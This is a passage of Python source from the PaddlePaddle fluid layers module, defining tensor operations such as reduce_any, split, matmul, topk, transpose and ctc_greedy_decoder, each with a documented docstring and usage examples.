attrs={
'dim': dim if dim != None and dim != [] else [0],
'keep_dim': keep_dim,
'reduce_all': True if dim == None or dim == [] else False
})
return out
def reduce_any(input, dim=None, keep_dim=False, name=None):
"""
This OP computes the ``logical or`` of tensor elements over the given dimension, and output the result.
Args:
input (Variable): The input variable which is a Tensor or LoDTensor, the input data type should be `bool`.
        dim (list|int|optional): The dimension along which the logical or is computed.
            If :attr:`None`, compute the logical or over all elements of
:attr:`input` and return a Tensor variable with a single element,
otherwise must be in the range :math:`[-rank(input), rank(input))`.
If :math:`dim[i] < 0`, the dimension to reduce is :math:`rank + dim[i]`. The default value is None.
keep_dim (bool): Whether to reserve the reduced dimension in the
output Tensor. The result tensor will have one fewer dimension
than the :attr:`input` unless :attr:`keep_dim` is true. The default value is False.
        name(str|None): A name for this layer(optional). If set None, the layer
            will be named automatically. The default value is None.
Returns:
        Variable: The reduced tensor variable with ``logical or`` in the given dims. The output data type is bool.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import paddle.fluid.layers as layers
import numpy as np
# x is a bool Tensor variable with following elements:
# [[True, False]
# [False, False]]
x = layers.assign(np.array([[1, 0], [0, 0]], dtype='int32'))
x = layers.cast(x, 'bool')
out = layers.reduce_any(x) # True
out = layers.reduce_any(x, dim=0) # [True, False]
out = layers.reduce_any(x, dim=-1) # [True, False]
# keep_dim=False, x.shape=(2,2), out.shape=(2,)
out = layers.reduce_any(x, dim=1,
keep_dim=True) # [[True], [False]]
# keep_dim=True, x.shape=(2,2), out.shape=(2,1)
"""
helper = LayerHelper('reduce_any', **locals())
out = helper.create_variable_for_type_inference(dtype=helper.input_dtype())
if dim is not None and not isinstance(dim, list):
dim = [dim]
helper.append_op(
type='reduce_any',
inputs={'X': input},
outputs={'Out': out},
attrs={
'dim': dim if dim != None and dim != [] else [0],
'keep_dim': keep_dim,
'reduce_all': True if dim == None or dim == [] else False
})
return out
def split(input, num_or_sections, dim=-1, name=None):
"""
Split the input tensor into multiple sub-Tensors.
Args:
input (Variable): The input variable which is an N-D Tensor or LoDTensor, data type being float32, float64, int32 or int64.
num_or_sections (int|list|tuple): If :attr:`num_or_sections` is an integer,
then the integer indicates the number of equal sized sub-Tensors
that the Tensor will be divided into. If :attr:`num_or_sections`
is a list or tuple, the length of it indicates the number of
sub-Tensors and the elements in it indicate the sizes of sub-Tensors'
:attr:`dim` dimension, in order. The length of the list must not be larger than the size of the Tensor along :attr:`dim` .
dim (int32|Variable, optional): A scalar with type ``int32`` or a ``Tensor`` with shape [1] and type ``int32``. The dimension along which to split. If :math:`dim < 0`, the
dimension to split along is :math:`rank(input) + dim`. Default is -1.
name(str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name` .
Returns:
list(Variable): The list of segmented Tensor variables.
Raises:
TypeError: num_or_sections is not int, list or tuple.
TypeError: dim is not int or Variable.
Example:
.. code-block:: python
import paddle.fluid as fluid
# input is a variable which shape is [3, 9, 5]
input = fluid.data(
name="input", shape=[3, 9, 5], dtype="float32")
x0, x1, x2 = fluid.layers.split(input, num_or_sections=3, dim=1)
# x0.shape [3, 3, 5]
# x1.shape [3, 3, 5]
# x2.shape [3, 3, 5]
x0, x1, x2 = fluid.layers.split(input, num_or_sections=[2, 3, 4], dim=1)
# x0.shape [3, 2, 5]
# x1.shape [3, 3, 5]
# x2.shape [3, 4, 5]
x0, x1, x2 = fluid.layers.split(input, num_or_sections=[2, 3, -1], dim=1)
# x0.shape [3, 2, 5]
# x1.shape [3, 3, 5]
# x2.shape [3, 4, 5]
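# A small additional sketch (not from the original example): ``dim`` may also
# be given as a 1-D int32 Tensor holding the split axis; ``dim_t`` is a name chosen here.
dim_t = fluid.layers.fill_constant([1], "int32", 1)
x0, x1, x2 = fluid.layers.split(input, num_or_sections=3, dim=dim_t)
# x0.shape [3, 3, 5], x1.shape [3, 3, 5], x2.shape [3, 3, 5]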
"""
if in_dygraph_mode():
num = None
attrs = ()
if isinstance(dim, Variable):
dim = dim.numpy()
assert dim.shape == (1,
), "dim of type Variable should have shape [1]"
dim = dim[0]
dim = (len(input.shape) + dim) if dim < 0 else dim
attrs += ('axis', dim)
if isinstance(num_or_sections, int):
num = num_or_sections
attrs += ('num', num_or_sections)
elif isinstance(num_or_sections, (list, tuple)):
num = len(num_or_sections)
if utils._contain_var(num_or_sections):
raise TypeError(
"The type of 'num_or_sections' in split must be int or list[int] or tuple[int] in Dygraph mode, but "
"received %s, which contains Variable." %
(type(num_or_sections)))
else:
attrs += ('sections', list(num_or_sections))
else:
raise TypeError(
"The type of 'num_or_sections' in split must be int or list in Dygraph mode, but "
"received %s." % (type(num_or_sections)))
return core.ops.split(input, num, *attrs)
if not isinstance(num_or_sections, (int, list, tuple)):
raise TypeError(
"The type of 'num_or_sections' in split must be int, list or "
"tuple, but received %s." % (type(num_or_sections)))
if not isinstance(dim, (int, Variable)):
raise TypeError(
"The type of 'dim' in split must be int or Variable, but "
"received %s." % (type(dim)))
helper = LayerHelper('split', **locals())
input_shape = input.shape
inputs = {'X': input}
attrs = {'num': num_or_sections if isinstance(num_or_sections, int) else 0}
def _get_SectionsTensorList(one_list):
tensor_list = []
unk_dim_idx = -1
for idx, dim_size in enumerate(one_list):
if isinstance(dim_size, Variable):
dim_size.stop_gradient = True
tensor_list.append(dim_size)
else:
assert (isinstance(dim_size, int))
if dim_size == -1:
assert unk_dim_idx == -1, (
"Only one value of 'num_or_section' in split can "
"be -1. But received num_or_section[%d] is also -1." %
idx)
unk_dim_idx = idx
temp_out = helper.create_variable_for_type_inference('int32')
fill_constant(
[1], 'int32', dim_size, force_cpu=True, out=temp_out)
tensor_list.append(temp_out)
return tensor_list
if isinstance(dim, Variable):
dim.stop_gradient = True
inputs['AxisTensor'] = dim
else:
dim = (len(input_shape) + dim) if dim < 0 else dim
attrs['axis'] = dim
if isinstance(num_or_sections, int):
assert num_or_sections > 1, 'num_or_sections must be more than 1.'
if isinstance(dim, int) and input_shape[dim] > 0:
assert input_shape[dim] % num_or_sections == 0, \
"The input's size along the split dimension " \
"must be evenly divisible by Attr(num_or_sections). " \
"But %d is not evenly divisible by %d. " % (input_shape[dim], num_or_sections)
num = num_or_sections
else:
if isinstance(dim, int) and input_shape[dim] > 0:
assert len(num_or_sections) <= input_shape[
dim], 'len(num_or_sections) must not be more than input.shape[dim].'
num = len(num_or_sections)
attrs['sections'] = list(
map(lambda ele: -1 if isinstance(ele, Variable) else ele,
num_or_sections))
if utils._contain_var(num_or_sections):
inputs['SectionsTensorList'] = _get_SectionsTensorList(
num_or_sections)
outs = [
helper.create_variable_for_type_inference(dtype=helper.input_dtype())
for i in range(num)
]
helper.append_op(
type='split', inputs=inputs, outputs={'Out': outs}, attrs=attrs)
return outs
def l2_normalize(x, axis, epsilon=1e-12, name=None):
"""
This op normalizes `x` along dimension `axis` using an L2
norm. For a 1-D tensor (`axis` is fixed to 0), this layer computes
.. math::
y = \\frac{x}{\sqrt{\sum{x^2} + epsilon}}
For `x` with more dimensions, this layer independently normalizes each 1-D
slice along dimension `axis`.
Args:
x(Variable|list): The input tensor could be N-D tensor, and the input data type could be float32 or float64.
axis(int): The axis on which to apply normalization. If `axis < 0`, \
the dimension to normalize is rank(x) + axis. -1 is the
last dimension.
epsilon(float): The epsilon value is used to avoid division by zero, \
the default value is 1e-12.
name(str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Variable: The output has the same shape and data type with `x`.
Examples:
.. code-block:: python
# declarative mode
import paddle.fluid as fluid
import numpy as np
input = fluid.data(name="input", shape=[2,3])
output = fluid.layers.l2_normalize(x=input,axis=0)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
input_data = np.random.rand(2,3).astype("float32")
print(input_data)
# [[0.5171216 0.12704141 0.56018186]
# [0.93251234 0.5382788 0.81709313]]
output_data = exe.run(fluid.default_main_program(),
feed={"input":input_data},
fetch_list=[output],
return_numpy=True)
print(output_data)
# [array([[0.48496857, 0.22970329, 0.56545246],
# [0.8745316 , 0.9732607 , 0.82478094]], dtype=float32)]
# imperative mode
import paddle.fluid.dygraph as dg
with dg.guard(place) as g:
input = dg.to_variable(input_data)
output = fluid.layers.l2_normalize(x=input, axis=-1)
print(output.numpy())
# [[0.66907585 0.16437206 0.7247892 ]
# [0.6899054 0.3982376 0.6045142 ]]
"""
if len(x.shape) == 1:
axis = 0
helper = LayerHelper("l2_normalize", **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
norm = helper.create_variable_for_type_inference(dtype=x.dtype)
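# l2_normalize is lowered to the 'norm' op: 'Out' is the normalized tensor and
# 'Norm' keeps the computed norms as an intermediate output.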
helper.append_op(
type="norm",
inputs={"X": x},
outputs={"Out": out,
"Norm": norm},
attrs={
"axis": 1 if axis is None else axis,
"epsilon": epsilon,
})
return out
def matmul(x, y, transpose_x=False, transpose_y=False, alpha=1.0, name=None):
"""
Applies matrix multiplication to two tensors.
Currently, the input tensors' rank can be any, but when the rank of either
input is larger than 3, the two inputs' ranks must be equal.
The actual behavior depends on the shapes of :math:`x`, :math:`y` and the
flag values of :attr:`transpose_x`, :attr:`transpose_y`. Specifically:
- If a transpose flag is specified, the last two dimensions of the tensor
are transposed. If the tensor is rank-1 of shape :math:`[D]`, then for
:math:`x` it is treated as :math:`[1, D]` in nontransposed form and as
:math:`[D, 1]` in transposed form, whereas for :math:`y` it is the
opposite: It is treated as :math:`[D, 1]` in nontransposed form and as
:math:`[1, D]` in transposed form.
- After transpose, the two tensors are 2-D or n-D and matrix multiplication
performs in the following way.
- If both are 2-D, they are multiplied like conventional matrices.
- If either is n-D, it is treated as a stack of matrices residing in the
last two dimensions and a batched matrix multiply supporting broadcast
applies on the two tensors.
Also note that if the raw tensor :math:`x` or :math:`y` is rank-1 and
nontransposed, the prepended or appended dimension :math:`1` will be
removed after matrix multiplication.
Args:
x (Variable): The input variable which is a Tensor or LoDTensor.
y (Variable): The input variable which is a Tensor or LoDTensor.
transpose_x (bool): Whether to transpose :math:`x` before multiplication.
transpose_y (bool): Whether to transpose :math:`y` before multiplication.
alpha (float): The scale of output. Default 1.0.
name(str|None): A name for this layer(optional). If set None, the layer
will be named automatically.
Returns:
Variable: The product Tensor (or LoDTensor) variable.
Examples:
.. code-block:: python
# Examples to clarify shapes of the inputs and output
# x: [B, ..., M, K], y: [B, ..., K, N]
# fluid.layers.matmul(x, y) # out: [B, ..., M, N]
# x: [B, M, K], y: [B, K, N]
# fluid.layers.matmul(x, y) # out: [B, M, N]
# x: [B, M, K], y: [K, N]
# fluid.layers.matmul(x, y) # out: [B, M, N]
# x: [M, K], y: [K, N]
# fluid.layers.matmul(x, y) # out: [M, N]
# x: [B, M, K], y: [K]
# fluid.layers.matmul(x, y) # out: [B, M]
# x: [K], y: [K]
# fluid.layers.matmul(x, y) # out: [1]
# x: [M], y: [N]
# fluid.layers.matmul(x, y, True, True) # out: [M, N]
import paddle.fluid as fluid
x = fluid.layers.data(name='x', shape=[2, 3], dtype='float32')
y = fluid.layers.data(name='y', shape=[3, 2], dtype='float32')
out = fluid.layers.matmul(x, y, True, True)
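# An additional hedged sketch: ``alpha`` scales every element of the product,
# so the result below equals 2.0 * matmul(x, y).
out_scaled = fluid.layers.matmul(x, y, alpha=2.0)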
"""
return paddle.matmul(x, y, transpose_x, transpose_y, alpha, name)
def topk(input, k, name=None):
"""
This OP is used to find values and indices of the k largest entries
for the last dimension.
If the input is a 1-D Tensor, finds the k largest entries and outputs
their values and indices.
If the input is a Tensor with higher rank, this operator computes the top k
entries along the last dimension.
.. code-block:: text
Case 1:
Input:
input.shape = [3, 4]
input.data = [[5, 4, 2, 3],
[9, 7, 10, 25],
[6, 2, 10, 1]]
k = 2
Output:
The first output:
values.shape = [3, 2]
values.data = [[5, 4],
[10, 25],
[6, 10]]
The second output:
indices.shape = [3, 2]
indices.data = [[0, 1],
[2, 3],
[0, 2]]
Args:
input(Variable): The input tensor. Support data types: float32, float64.
k(int | Variable): The number of top elements to look for along the last dimension
of input tensor.
name (str, optional): Please refer to :ref:`api_guide_Name`, Default None.
Returns:
Values (Variable): Input tensor's k largest elements along each last dimensional slice. The dimension is: :math:`input.shape[:-1]+[k]`.
Indices (Variable): Indices of k largest elements along the last dimension of input. The dimension is same as values.
Raises:
ValueError: If :math:`k < 1` or :math:`k > last dimension of input`.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import paddle.fluid.layers as layers
# set batch size=None
input = fluid.data(name="input", shape=[None, 13, 11], dtype='float32')
top5_values, top5_indices = layers.topk(input, k=5) # top5_values.shape[None, 13, 5], top5_indices.shape=[None, 13, 5]
# 1D Tensor
input1 = fluid.data(name="input1", shape=[None, 13], dtype='float32')
top5_values, top5_indices = layers.topk(input1, k=5) #top5_values.shape=[None, 5], top5_indices.shape=[None, 5]
# k=Variable
input2 = fluid.data(name="input2", shape=[None, 13, 11], dtype='float32')
vk = fluid.data(name="vk", shape=[None, 1], dtype='int32') # save k in vk.data[0]
vk_values, vk_indices = layers.topk(input2, k=vk) #vk_values.shape=[None, 13, k], vk_indices.shape=[None, 13, k]
"""
if in_dygraph_mode():
_k = k.numpy().item(0) if isinstance(k, Variable) else k
out, indices = core.ops.top_k(input, 'k', _k)
out.stop_gradient = True
indices.stop_gradient = True
return out, indices
inputs = {"X": [input]}
attrs = {}
if isinstance(k, Variable):
inputs['K'] = [k]
else:
attrs = {'k': k}
helper = LayerHelper("top_k", **locals())
values = helper.create_variable_for_type_inference(dtype=input.dtype)
indices = helper.create_variable_for_type_inference(dtype="int64")
helper.append_op(
type="top_k",
inputs=inputs,
outputs={"Out": [values],
"Indices": [indices]},
attrs=attrs)
values.stop_gradient = True
indices.stop_gradient = True
return values, indices
def ctc_greedy_decoder(input,
blank,
input_length=None,
padding_value=0,
name=None):
"""
This op is used to decode sequences by greedy policy by the following steps:
1. Get the indexes of maximum value for each row in input. a.k.a.
numpy.argmax(input, axis=0).
2. For each sequence in result of step1, merge repeated tokens between two
blanks and delete all blanks.
This op is implemented in two modes: lod and padding, either of them can be used.
The input can be either LoDTensor or Tensor, corresponding to lod and padding
mode respectively.
A simple example as below:
.. code-block:: text
Given:
(1) for lod mode:
input.data = [[0.6, 0.1, 0.3, 0.1],
[0.3, 0.2, 0.4, 0.1],
[0.1, 0.5, 0.1, 0.3],
[0.5, 0.1, 0.3, 0.1],
[0.5, 0.1, 0.3, 0.1],
[0.2, 0.2, 0.2, 0.4],
[0.2, 0.2, 0.1, 0.5],
[0.5, 0.1, 0.3, 0.1]]
input.lod = [[4, 4]]
Computation:
step1: Apply argmax to first input sequence which is input.data[0:4]. Then we get:
[[0], [2], [1], [0]]
step2: merge repeated tokens and remove blank which is 0. Then we get first output sequence:
[[2], [1]]
Finally:
output.data = [[2],
[1],
[3]]
output.lod = [[2, 1]]
(2) for padding mode:
input.data = [[[0.6, 0.1, 0.3, 0.1],
[0.3, 0.2, 0.4, 0.1],
[0.1, 0.5, 0.1, 0.3],
[0.5, 0.1, 0.3, 0.1]],
[[0.5, 0.1, 0.3, 0.1],
[0.2, 0.2, 0.2, 0.4],
[0.2, 0.2, 0.1, 0.5],
[0.5, 0.1, 0.3, 0.1]]]
input_length.data = [[4], [4]]
input.shape = [2, 4, 4]
step1: Apply argmax to first input sequence which is input.data[0:4]. Then we get:
[[0], [2], [1], [0]], for input.data[4:8] is [[0], [3], [3], [0]], shape is [2,4,1]
step2: Change the argmax result to use padding mode, then argmax result is
[[0, 2, 1, 0], [0, 3, 3, 0]], shape is [2, 4], lod is [], input_length is [[4], [4]]
step3: Apply ctc_align to padding argmax result, padding_value is 0
Finally:
output.data = [[2, 1, 0, 0],
[3, 0, 0, 0]]
output_length.data = [[2], [1]]
Parameters:
input(Variable): the probabilities of variable-length sequences. When in lod mode,
it is a 2-D LoDTensor with LoD information. Its shape is [Lp, num_classes + 1],
where Lp is the sum of all input sequences' lengths and
num_classes is the true number of classes. When in padding mode,
it is a 3-D Tensor with padding. Its shape is [batch_size, N, num_classes + 1].
(not including the blank label). The data type can be float32 or float64.
blank(int): the blank label index of Connectionist Temporal
Classification (CTC) loss, which is in the half-open
interval [0, num_classes + 1).
input_length(Variable, optional): 2-D LoDTensor, shape is [batch_size, 1], data type is int64.
It is used for padding mode. In lod mode, input_length is None.
padding_value(int): padding value.
name(str, optional): The default value is None.
Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name`
Returns:
For lod mode, returns the result of CTC greedy decoder, 2-D LoDTensor, shape is [Lp, 1], \
data type is int64. 'Lp' is the sum of all output sequences' length. If all the sequences \
in result were empty, the result LoDTensor will be [-1] with empty \
LoD [[]].
For padding mode, returns a tuple of (output, output_length), which was described as below:
output, 2-D Tensor, shape is [batch_size, N], data type is int64.
output_length, 2-D Tensor, shape is [batch_size, 1], data type is int64. It is the length of \
each sequence of output for padding mode.
Return type:
For lod mode: Variable
For padding mode: tuple of two Variables (output, output_length).
Examples:
.. code-block:: python
# for lod mode
import paddle.fluid as fluid
x = fluid.data(name='x', shape=[None, 8], dtype='float32', lod_level=1)
cost = fluid.layers.ctc_greedy_decoder(input=x, blank=0)
# for padding mode
x_pad = fluid.data(name='x_pad', shape=[10, 4, 8], dtype='float32')
x_pad_len = fluid.data(name='x_pad_len', shape=[10, 1], dtype='int64')
out, out_len = fluid.layers.ctc_greedy_decoder(input=x_pad, blank=0,
input_length=x_pad_len)
"""
helper = LayerHelper("ctc_greedy_decoder", **locals())
_, topk_indices = topk(input, k=1)
# ctc align op
ctc_out = helper.create_variable_for_type_inference(dtype="int64")
if input_length is None:
helper.append_op(
type="ctc_align",
inputs={"Input": [topk_indices]},
outputs={"Output": [ctc_out]},
attrs={"merge_repeated": True,
"blank": blank})
return ctc_out
else:
ctc_out_len = helper.create_variable_for_type_inference(dtype="int64")
ctc_input = squeeze(topk_indices, [2])
helper.append_op(
type="ctc_align",
inputs={"Input": [ctc_input],
"InputLength": [input_length]},
outputs={"Output": [ctc_out],
"OutputLength": [ctc_out_len]},
attrs={
"merge_repeated": True,
"blank": blank,
"padding_value": padding_value
})
return ctc_out, ctc_out_len
def transpose(x, perm, name=None):
"""
Permute the data dimensions of `input` according to `perm`.
The `i`-th dimension of the returned tensor will correspond to the
perm[i]-th dimension of `input`.
Args:
x (Variable): The input Tensor. It is a N-D Tensor of data types float32, float64, int32.
perm (list): Permute the input according to the data of perm.
name (str): The name of this layer. It is optional.
Returns:
Variable: A transposed n-D Tensor, with data type being float32, float64, int32, int64.
For Example:
.. code-block:: text
x = [[[ 1 2 3 4] [ 5 6 7 8] [ 9 10 11 12]]
[[13 14 15 16] [17 18 19 20] [21 22 23 24]]]
shape(x) = [2,3,4]
# Example 1
perm0 = [1,0,2]
y_perm0 = [[[ 1 2 3 4] [13 14 15 16]]
[[ 5 6 7 8] [17 18 19 20]]
[[ 9 10 11 12] [21 22 23 24]]]
shape(y_perm0) = [3,2,4]
# Example 2
perm1 = [2,1,0]
y_perm1 = [[[ 1 13] [ 5 17] [ 9 21]]
[[ 2 14] [ 6 18] [10 22]]
[[ 3 15] [ 7 19] [11 23]]
[[ 4 16] [ 8 20] [12 24]]]
shape(y_perm1) = [4,3,2]
Examples:
.. code-block:: python
# use append_batch_size=False to avoid prepending extra
# batch size in shape
import paddle.fluid as fluid
x = fluid.layers.data(name='x', shape=[2, 3, 4],
dtype='float32', append_batch_size=False)
x_transposed = fluid.layers.transpose(x, perm=[1, 0, 2])
print(x_transposed.shape)
# (3, 2, 4)
"""
if in_dygraph_mode():
out, _ = core.ops.transpose2(x, 'axis', perm)
return out
check_variable_and_dtype(
x, 'x', ['float16', 'float32', 'float64', 'int32', 'int64'],
'transpose')
check_type(perm, 'perm', list, 'transpose')
if len(perm) != len(x.shape):
raise ValueError(
"Input(perm) is the permutation of dimensions of Input(x), "
"its length should be equal to dimensions of Input(x), "
"but received dimension of Input(x) is %s, "
"the length of Input(perm) is %s." % (len(x.shape), len(perm)))
for idx, dim in enumerate(perm):
if dim >= len(x.shape):
raise ValueError(
"Each element in Input(perm) should be less than Input(x)'s dimension, "
"but %d-th element in Input(perm) is %d which exceeds Input(x)'s "
"dimension %d." % (idx, perm[idx], len(x.shape)))
helper = LayerHelper('transpose', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
x_shape = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='transpose2',
inputs={'X': [x]},
outputs={'Out': [out],
'XShape': [x_shape]},
attrs={'axis': perm})
return out
def im2sequence(input,
filter_size=1,
stride=1,
padding=0,
input_image_size=None,
out_stride=1,
name=None):
"""
Extracts image patches from the input tensor to form a tensor of shape
{input.batch_size * output_height * output_width, filter_size_height *
filter_size_width * input.channels}. This op uses filters to scan images
and convert these images to sequences. After expanding, the number of time steps is
output_height * output_width for an image, in which output_height and
output_width are calculated by below equation:
.. math::
output\_height = 1 + \
(padding\_up + padding\_down + input\_height - filter\_size\_height + stride\_height - 1) / stride\_height \\\\
output\_width = 1 + \
(padding\_left + padding\_right + input\_width - filter\_size\_width + stride\_width - 1) / stride\_width
And the dimension of each time step is filter_size_height * filter_size_width * input.channels.
Parameters:
input (Variable): The input should be a 4-D Tensor in :math:`NCHW` format. The data type is float32.
filter_size(int32 | List[int32]): The filter size. If filter_size is a List,
it must contain two integers, :math:`[filter\_size\_height, filter\_size\_width]` .
Otherwise, the filter size will be a square :math:`[filter\_size, filter\_size]` . Default is 1.
stride(int32 | List[int32]): The stride size. If stride is a List, it must
contain two integers, :math:`[stride\_height, stride\_width]` . Otherwise, the stride size will be a square :math:`[stride\_size, stride\_size]` . Default is 1.
padding(int32 | List[int32]): The padding size. If padding is a List, it can
contain four integers like :math:`[padding\_up, padding\_left, padding\_down, padding\_right]` to indicate
paddings of four direction. Or it can contain two integers :math:`[padding\_height, padding\_width]` which means
padding_up = padding_down = padding_height and
padding_left = padding_right = padding_width. Otherwise, a scalar padding means
padding_up = padding_down = padding_left = padding_right = padding.
Default is 0.
input_image_size(Variable, optional): the input contains the real size of the images. Its dim
is :math:`[batchsize, 2]` . It is only used for batch inference when not None. Default is None.
out_stride(int32 | List[int32]): The scaling of image through CNN. It is valid only when input_image_size is not None.
If out_stride is List, it must contain two integers,
:math:`[out\_stride\_height, out\_stride\_width]` . Otherwise,
the out_stride_height = out_stride_width = out_stride. Default is 1.
name (str, optional): The default value is None. Normally there is no need for
user to set this property. For more information, please refer to :ref:`api_guide_Name` .
Returns:
The output is a 2-D LoDTensor with shape {input.batch\_size * output\_height * output\_width, \
filter\_size\_height * filter\_size\_width * input.channels}. The data type is float32.
Return Type: Variable
Examples:
.. code-block:: text
Given:
x = [[[[ 6. 2. 1.]
[ 8. 3. 5.]
[ 0. 2. 6.]]
[[ 2. 4. 4.]
[ 6. 3. 0.]
[ 6. 4. 7.]]]
[[[ 6. 7. 1.]
[ 5. 7. 9.]
[ 2. 4. 8.]]
[[ 1. 2. 1.]
[ 1. 3. 5.]
[ 9. 0. 8.]]]]
x.dims = {2, 2, 3, 3}
And:
filter = [2, 2]
stride = [1, 1]
padding = [0, 0]
Then:
output.data = [[ 6. 2. 8. 3. 2. 4. 6. 3.]
[ 2. 1. 3. 5. 4. 4. 3. 0.]
[ 8. 3. 0. 2. 6. 3. 6. 4.]
[ 3. 5. 2. 6. 3. 0. 4. 7.]
[ 6. 7. 5. 7. 1. 2. 1. 3.]
[ 7. 1. 7. 9. 2. 1. 3. 5.]
[ 5. 7. 2. 4. 1. 3. 9. 0.]
[ 7. 9. 4. 8. 3. 5. 0. 8.]]
output.dims = {8, 8}
output.lod = [[4, 4]]
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.data(name='data', shape=[None, 3, 32, 32],
dtype='float32')
output = fluid.layers.im2sequence(
input=data, stride=[1, 1], filter_size=[2, 2])
"""
assert not in_dygraph_mode(), (
"sequence layer is not supported in dygraph mode yet.")
if isinstance(filter_size, int):
filter_size = [filter_size, filter_size]
if isinstance(stride, int):
stride = [stride, stride]
if isinstance(padding, int):
padding = [padding, padding]
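# A 2-element padding [h, w] is expanded to the 4-element form
# [up, left, down, right] = [h, w, h, w].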
if len(padding) == 2:
padding.append(padding[0])
padding.append(padding[1])
inputs = {"X": input}
attrs = {"kernels": filter_size, "strides": stride, "paddings": padding}
if input_image_size:
if isinstance(out_stride, int):
out_stride = [out_stride, out_stride]
inputs["Y"] = input_image_size
attrs["out_stride"] = out_stride
helper = LayerHelper('im2sequence', **locals())
out = helper.create_variable_for_type_inference(dtype=helper.input_dtype())
helper.append_op(
type='im2sequence', inputs=inputs, outputs={'Out': out}, attrs=attrs)
return out
@templatedoc()
def row_conv(input, future_context_size, param_attr=None, act=None):
"""
${comment}
Args:
input (${x_type}): ${x_comment}.
future_context_size (int): Future context size. Please note, the shape
of convolution kernel is [future_context_size + 1, D].
param_attr (ParamAttr): Attributes of parameters, including
name, initializer etc.
act (str): Non-linear activation to be applied to output variable.
Returns:
${out_comment}.
Examples:
>>> # for LodTensor inputs
>>> import paddle.fluid as fluid
>>> x = fluid.data(name='x', shape=[9, 16],
>>> dtype='float32', lod_level=1)
>>> out = fluid.layers.row_conv(input=x, future_context_size=2)
>>> # for Tensor inputs
>>> x = fluid.data(name='x', shape=[9, 4, 16], dtype='float32')
>>> out = fluid.layers.row_conv(input=x, future_context_size=2)
"""
helper = LayerHelper('row_conv', **locals())
dtype = helper.input_dtype()
filter_shape = [future_context_size + 1, input.shape[-1]]
filter_param = helper.create_parameter(
attr=helper.param_attr, shape=filter_shape, dtype=dtype)
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='row_conv',
inputs={'X': [input],
'Filter': [filter_param]},
outputs={'Out': [out]})
return helper.append_activation(out)
@templatedoc()
def multiplex(inputs, index):
"""
Based on the given index parameter, the OP selects a specific row from each input Tensor to construct the output Tensor.
If the input of this OP contains :math:`m` Tensors, where :math:`I_{i}` means the i-th input Tensor, :math:`i` between :math:`[0,m)` .
And :math:`O` means the output, where :math:`O[i]` means the i-th row of the output, then the output satisfies that :math:`O[i] = I_{index[i]}[i]` .
For Example:
.. code-block:: text
Given:
inputs = [[[0,0,3,4], [0,1,3,4], [0,2,4,4], [0,3,3,4]],
[[1,0,3,4], [1,1,7,8], [1,2,4,2], [1,3,3,4]],
[[2,0,3,4], [2,1,7,8], [2,2,4,2], [2,3,3,4]],
[[3,0,3,4], [3,1,7,8], [3,2,4,2], [3,3,3,4]]]
index = [[3],[0],[1],[2]]
out = [[3,0,3,4], # out[0] = inputs[index[0]][0] = inputs[3][0] = [3,0,3,4]
[0,1,3,4], # out[1] = inputs[index[1]][1] = inputs[0][1] = [0,1,3,4]
[1,2,4,2], # out[2] = inputs[index[2]][2] = inputs[1][2] = [1,2,4,2]
[2,3,3,4]] # out[3] = inputs[index[3]][3] = inputs[2][3] = [2,3,3,4]
Args:
inputs (list): The input Tensor list. The list elements are N-D Tensors of data types float32, float64, int32, int64. All input Tensor shapes should be the same and rank must be at least 2.
index (Variable): Used to select some rows in the input Tensor to construct an index of the output Tensor. It is a 2-D Tensor with data type int32 or int64 and shape [M, 1], where M is the number of input Tensors.
Returns:
Variable(Tensor): Output of multiplex OP, with data type being float32, float64, int32, int64.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
x1 = fluid.data(name='x1', shape=[None, 2], dtype='float32')
x2 = fluid.data(name='x2', shape=[None, 2], dtype='float32')
index = fluid.data(name='index', shape=[None, 1], dtype='int32')
out = fluid.layers.multiplex(inputs=[x1, x2], index=index)
exe = fluid.Executor(fluid.CPUPlace())
exe.run(fluid.default_startup_program())
img1 = np.array([[1, 2], [3, 4]]).astype(np.float32)
img2 = np.array([[5, 6], [7, 8]]).astype(np.float32)
index = np.array([[1], [0]]).astype(np.int32)
res = exe.run(fluid.default_main_program(), feed={'x1':img1, 'x2':img2, 'index':index}, fetch_list=[out])
print(res) # [array([[5., 6.], [3., 4.]], dtype=float32)]
"""
helper = LayerHelper('multiplex', **locals())
if not isinstance(inputs, list) or len(inputs) < 2:
raise ValueError("inputs should be a list object that contains at least "
"2 elements.")
out = helper.create_variable_for_type_inference(inputs[0].dtype)
helper.append_op(
type='multiplex',
inputs={'X': inputs,
'Ids': index},
outputs={'Out': [out]})
return out
def smooth_l1(x, y, inside_weight=None, outside_weight=None, sigma=None):
"""
This layer computes the smooth L1 loss for Variable :attr:`x` and :attr:`y`.
It takes the first dimension of :attr:`x` and :attr:`y` as batch size.
For each instance, it computes the smooth L1 loss element by element first
and then sums all the losses. So the shape of output Variable is
[batch_size, 1].
Args:
x (Variable): A tensor with rank at least 2. The input value of smooth
L1 loss op with shape [batch_size, dim1, ..., dimN].
A LoDTensor or Tensor with type float32.
y (Variable): A tensor with rank at least 2. The target value of smooth
L1 loss op with same shape as :attr:`x`.
A LoDTensor or Tensor with type float32.
inside_weight (Variable|None): A tensor with rank at least 2. This
input is optional and should have same shape with :attr:`x`. If
provided, the result of (:attr:`x` - :attr:`y`) will be multiplied
by this tensor element by element.
A Tensor with type float32.
outside_weight (Variable|None): A tensor with rank at least 2. This
input is optional and should have same shape with :attr:`x`. If
provided, the out smooth L1 loss will be multiplied by this tensor
element by element.
A Tensor with type float32.
sigma (float|None): Hyper parameter of smooth L1 loss layer. A float
scalar with default value 1.0.
Returns:
Variable: The output smooth L1 loss with shape [batch_size, 1]. A Tensor with type float32.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
data = fluid.data(name="x", shape=[-1, 3], dtype="float32")
label = fluid.data(name="y", shape=[-1, 3], dtype="float32")
result = fluid.layers.smooth_l1(data,label)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
